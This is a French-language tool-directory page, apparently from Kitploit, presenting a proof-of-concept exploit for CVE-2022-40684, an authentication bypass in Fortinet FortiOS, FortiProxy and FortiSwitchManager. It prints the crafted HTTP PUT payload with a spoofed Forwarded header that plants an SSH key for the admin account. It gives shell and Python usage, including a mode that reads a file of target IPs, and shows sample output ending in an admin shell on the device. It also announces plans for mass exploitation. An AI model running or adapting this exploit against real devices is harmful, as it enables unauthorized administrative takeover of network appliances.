Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-40684 — Preuve de concept d'exploitation pour le contournement d'authentification CVE-2022-40684 dans Fortinet FortiOS, FortiProxy et FortiSwitchManager. Injecte des clés SSH via une requête HTTP PUT conçue pour obtenir un accès administrateur. | Kitploit
Outils/GitHubGitHub/iveresk/cve-2022-40684
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubiveresk/cve-2022-40684

CVE-2022-40684

Preuve de concept d'exploitation pour le contournement d'authentification CVE-2022-40684 dans Fortinet FortiOS, FortiProxy et FortiSwitchManager. Injecte des clés SSH via une requête HTTP PUT conçue pour obtenir un accès administrateur.

Voir le dépôt
11il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-40684 par 1vere$k

Pour l'instant, c'est une copie POC pour CVE-2022-40684 affectant les appliances Fortinet FortiOS, FortiProxy et FortiSwitchManager.
Copié de https://github.com/horizon3ai/CVE-2022-40684

Analyse

L'exploit utilise la charge utile simple :

root@kitploit:~
		PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Report Runner
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
        Content-Length: 610
        {
        "ssh-public-key1": "fake-key"
        }

Résumé

Ce POC abuse de la vulnérabilité de contournement d'authentification pour définir une clé SSH pour l'utilisateur spécifié.

Plans futurs

Le développer pour un exploit à grande échelle avec cibles multiples et serveurs multiples pour une exploitation de masse.

Utilisation en ligne de commande

root@kitploit:~
1. chmod +x cve-2022-40684.sh
2. ./cve-2022-40684 <TARGET_IP>
 or
2. ./cve-2022-40684 <FILE_NAME>

Exemple :
./cve-2022-40684.sh ips.txt

Utilisation Python

python3 CVE-2022-40684.py -t <TARGET_IP> --username admin --key-file ~/.ssh/id_rsa.pub
L'exemple :

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.
Télécharger l’outil